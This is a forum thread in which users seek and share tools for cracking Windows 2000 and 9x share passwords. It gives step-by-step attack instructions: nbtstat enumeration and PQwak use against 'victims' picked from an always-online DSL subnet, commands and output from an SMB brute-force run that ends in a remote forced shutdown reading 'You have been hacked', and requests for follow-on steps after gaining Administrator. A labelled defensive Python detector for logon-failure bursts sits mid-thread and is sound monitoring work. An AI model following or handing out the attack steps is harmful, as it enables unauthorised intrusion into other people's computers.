Full Version: Any Tools To Hack Windows 2000 Share Passwords
Hi friends
I am looking for a handy tool to find out the passwords of shared folders in a remote Windows 2000 server. Any friends could give me a hand please?
Manu
I got one that uses a dictionary file to crack the IPC$ share. Don't know of anything to brute force it though mate. There must be something out there though. I've heard of many worms using this method. I attached ipccrack.exe if you want it anyway.
Doesn't NAT [Netbios Auditing Tool] do that?
Yeah I think NAT.exe does it but where is it?
You can get a Unix and Windows variant here along with other tools-
http://www.cotse.com/tools/netbios.htm OR- http://www.astalavista.com/tools/auditing/...ecurityscanner/ OR- http://www.securityfocus.com/tools/543
Thanks v much.
Found a program called Brutus.
Lets you use user lists and pass lists as well as a built-in brute force option. I've only tried it against 2 of our machines, one running NT, the other 2000. On both I just get disconnected when trying to force the admin password over SMB. I'm working on it; if anyone else wants to try, it's available at: www.hoobie.net Also take a look at www.madirish.net This guy's cool and very free with knowledge. And one more thing, anyone know somewhere to go for updated password & user lists? Cheers
But a bruteforce attack on a remote machine, that could take years.
Because the password-checking speed will probably be about 1pass/2seconds.
So whats the simplest way to go about it?
lophtcrack it
I believe NAT is supposed to be the fastest out there for cracking shares. It's so fast I think it can crash the victim's machine.
edit: didn't notice it said 2k server ... but this info is good for 9x/me
Windows 95, 98, and Millennium have a vulnerability that will allow you to crack the passwords to these shares with amazing speed and without the need of brute forcing. For more information about this, you can read about it at http://www.securiteam.com/exploits/5WP010K4UA.html . Go to Start / Run or Windows key R and type command (cmd if you have Windows NT or 2000). When a command prompt opens up, type nbtstat -a ipaddress. Make sure to put the spaces in between the commands. You should get output that looks like this:

    Local Area Connection:
    Node IpAddress: [4.3.37.XXX] Scope Id: []

               NetBIOS Remote Machine Name Table

           Name               Type         Status
        ---------------------------------------------
        MATRIX          <00>  UNIQUE      Registered
        WORKGROUP       <00>  GROUP       Registered
        MATRIX          <20>  UNIQUE      Registered
        MATRIX          <03>  UNIQUE      Registered
        WORKGROUP       <1E>  GROUP       Registered
        ADMINISTRATOR   <03>  UNIQUE      Registered
        WORKGROUP       <1D>  UNIQUE      Registered
        ..__MSBROWSE__. <01>  GROUP       Registered
        MATRIX          <6A>  UNIQUE      Registered
        MATRIX          <87>  UNIQUE      Registered

        MAC Address = 00-80-C6-F9-X-X

The very first name is the NetBIOS name (MATRIX) and the sixth name is the current user on that computer. That could be used for other hacking reasons...possibly brute forcing, but that is a different lesson. Important! Remember the NetBIOS name because you will need that to crack the share password. Download a copy of PQwak and open it up. http://www.illmob.org/files/pqwak.zip
- Where it says NBNAME put the NetBIOS name that you acquired from nbtstat.
- Put the share name where it says SHARE. The share name is the name of the folder that is password protected.
- Put the IP of your victim where it says IP. Example 4.3.57.153. I am using the 4.x.x.x subnet because it is full of DSL users that are always online.
- The delay should be set accordingly depending on your connection speed. If your connection is a 56K dialup then I HIGHLY recommend your delay be approx. 1000 - 2000. If your connection is standard ADSL then I recommend you set the delay to 800-900.
I'm looking for a brute-forcer for the IPC$ share, too. I tested the "Essential Net Tools". It is a great tool, but if the pw list is too large, it hangs up :/
I wanted to use NAT...but I have some problems. I use it like this:

    nat -o output.txt -u userlist.txt -p passlist.txt target

I think nat tries to connect over the IPC$ share to the target and brute-forces the correct pw for the existing account from userlist.txt. But it doesn't. It reads out the netbios name tables and tries to connect. Then there are lines I don't understand:

    (nat.exe 1000) frame 5: sp = 0x245F00C, pc = 0x410492
    (nat.exe 1000) frame 6: sp = 0x245F028, pc = 0x407EFA
    (nat.exe 1000) frame 7: sp = 0x245F4D0, pc = 0x40A619
    ...

After this it is over. It only takes a few seconds, but no password from my passlist.txt was tried with one of the usernames by nat?? What's wrong??
I heard that the fastest was SMBAT, samba auditing tools
hxxp://www.cqure.net/tools.jsp?id=01

QUOTE
The SMB Auditing Tool is a password auditing tool for the Windows and the SMB platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremely fast to guess passwords on these platforms. Running a large password file against Windows 2000/XP shows statistics up to 1200 logins/sec. This means that you could run a commonly used English dictionary with 53 000 words against a server under a minute.

Features
-----------
* Scan hosts for active SMB servers (ie. not only if port is open)
* Automatic enumeration of users
* Support for full automatic mode
* Fast analysis of Windows 2000/XP servers
* Support for SMB over Netbios
* Support for native SMB over port 445
* Compiles on Linux/BSD
* Win32 support with Cygwin

News in version 1.0.4
---------------------------
* Bugfixes
* Added smbserverscan tool. This tool scans ports 139 and 445 for *active* SMB server.
* Added timeout to most tools, so that they will *not* "hang" scanning firewalled hosts.

It often gives me some trouble, just be sure you include the hostname and IP, I dunno why. Here's a sample of how I audited a computer here at my house:

QUOTE
C:\smb>smbbf -i192.168.0.2 -u c:\smb\username.txt -p c:\smb\pass.txt -g
INFO: Could not determine server name ...
-- Starting password analysis on 192.168.0.2 --
User: ADMINISTRATOR Password: admin
-- Password Statistics --
Total tries 16 in 0.06 seconds
Tries per second = 266.67
Total accounts 4, compromised 1, disabled 0
Penetration ratio = 25.00 %

C:\smb>net use \\192.168.0.2 /user:administrator
The password or user name is invalid for \\192.168.0.2.
Enter the password for 'administrator' to connect to '192.168.0.2':
The command completed successfully.

C:\smb>shutdown -s -f -m \\192.168.0.2 -t 05 -c "You have been hacked"

C:\smb>

So it does work, that's actual cmd prompt, un-edited.
I dunno if it's the same as NB auditing tools, but it doesn't appear to be the same; this one seems to go much faster than it.
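What a defender sees from the guessing runs discussed in this thread (a dictionary against IPC$, or SMBAT's automatic user enumeration) is a burst of network-logon failures in the target's Security log. The following Python is an added example, not code from the thread or from any of the tools named in it: it parses a constructed, simplified export of such events (event ID 529 is the NT/2000 "Logon Failure: Unknown user name or bad password" event; logon type 3 is a network logon, which is what an SMB connection produces) and flags sources that exceed a failure or distinct-account threshold inside a sliding window. The field layout, the thresholds and the sample addresses are assumptions made for the example.

```python
"""Sliding-window detection of SMB password guessing from logon-failure events.

Added example, not from the forum thread. The log format is a constructed,
simplified export: 'ISO-time event-id account logon-type source'.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List

LOGON_FAILURE = 529   # NT/2000: "Logon Failure: Unknown user name or bad password"
LOGON_SUCCESS = 528   # NT/2000: "Successful Logon"
NETWORK_LOGON = 3     # logon type used by SMB / IPC$ connections


@dataclass
class Event:
    time: datetime
    event_id: int
    account: str
    logon_type: int
    source: str


def parse_line(line: str) -> Event:
    """Parse one record of the assumed export format."""
    ts, eid, account, ltype, source = line.split()
    return Event(datetime.fromisoformat(ts), int(eid), account.lower(), int(ltype), source)


def build_sample() -> List[str]:
    """Constructed sample log (not real data): one dictionary burst against a single
    account, one sweep over many accounts, and one user who mistypes twice then logs in."""
    t0 = datetime(2004, 5, 11, 10, 0, 0)
    lines = []
    # 40 failures against 'administrator' in 4 seconds from 192.168.0.7 (dictionary run)
    for i in range(40):
        t = t0 + timedelta(milliseconds=100 * i)
        lines.append(f"{t.isoformat()} {LOGON_FAILURE} Administrator {NETWORK_LOGON} 192.168.0.7")
    # 6 different accounts tried once each within 30 seconds from 192.168.0.9 (enumeration/spray)
    for i, acct in enumerate(["administrator", "guest", "backup", "test", "sql", "www"]):
        t = t0 + timedelta(seconds=120 + 5 * i)
        lines.append(f"{t.isoformat()} {LOGON_FAILURE} {acct} {NETWORK_LOGON} 192.168.0.9")
    # Benign: jsmith fails twice six minutes apart, then succeeds
    lines.append(f"{(t0 + timedelta(minutes=10)).isoformat()} {LOGON_FAILURE} jsmith {NETWORK_LOGON} 192.168.0.22")
    lines.append(f"{(t0 + timedelta(minutes=16)).isoformat()} {LOGON_FAILURE} jsmith {NETWORK_LOGON} 192.168.0.22")
    lines.append(f"{(t0 + timedelta(minutes=16, seconds=5)).isoformat()} {LOGON_SUCCESS} jsmith {NETWORK_LOGON} 192.168.0.22")
    return lines


def detect_guessing(events: List[Event], window: timedelta = timedelta(seconds=60),
                    max_failures: int = 10, max_accounts: int = 5) -> List[dict]:
    """Keyed on source host, keep the network-logon failures seen inside `window`.

    'burst': more than max_failures failures from one source in the window
             (a dictionary run; account lockout stops this one).
    'spray': more than max_accounts distinct accounts failed from one source in the
             window (user enumeration / spraying; lockout does not stop this one).
    One alert per (source, kind), raised when the threshold is first crossed.
    """
    recent: Dict[str, Deque[Event]] = defaultdict(deque)
    alerts: List[dict] = []
    flagged = set()
    for ev in sorted(events, key=lambda e: e.time):
        if ev.event_id != LOGON_FAILURE or ev.logon_type != NETWORK_LOGON:
            continue
        q = recent[ev.source]
        q.append(ev)
        while q and ev.time - q[0].time > window:   # drop failures older than the window
            q.popleft()
        accounts = {e.account for e in q}
        checks = (("burst", len(q) > max_failures), ("spray", len(accounts) > max_accounts))
        for kind, hit in checks:
            if hit and (ev.source, kind) not in flagged:
                flagged.add((ev.source, kind))
                alerts.append({"source": ev.source, "kind": kind, "failures": len(q),
                               "accounts": sorted(accounts), "first": q[0].time, "last": ev.time})
    return alerts


def run_sample() -> List[dict]:
    """Run the detector over the constructed sample."""
    return detect_guessing([parse_line(line) for line in build_sample()])


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a['kind']:5} from {a['source']}: {a['failures']} failures in window, "
              f"accounts={a['accounts']} ({a['first'].time()} - {a['last'].time()})")
```

The two patterns are scored separately on purpose: an account-lockout policy defeats the single-account burst but does nothing against a sweep that tries each account only once, so the distinct-account count is the signal that matters for SMBAT-style enumeration. On a real Windows 2000 host the same fields come from the Security log with auditing of logon events enabled; the sources here are workstation names or addresses as the export records them.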
What can I also do if I got IPC$ connected as Administrator?
Are there some ways to upload files, like DAMEWARE does? If so, how does it work?...
Yes, excellent, but at my home this tool didn't share :s
Hoping to not lose face here.....but has anyone else come across this...
when using the SMB Auditing tool v1.0.4 I get an SMBNTCreateAndX error, which I think may be the reason why, after the prog has run and successfully compromised an account, the compromised account and pass are not displayed; the same applies with outputting the results to file.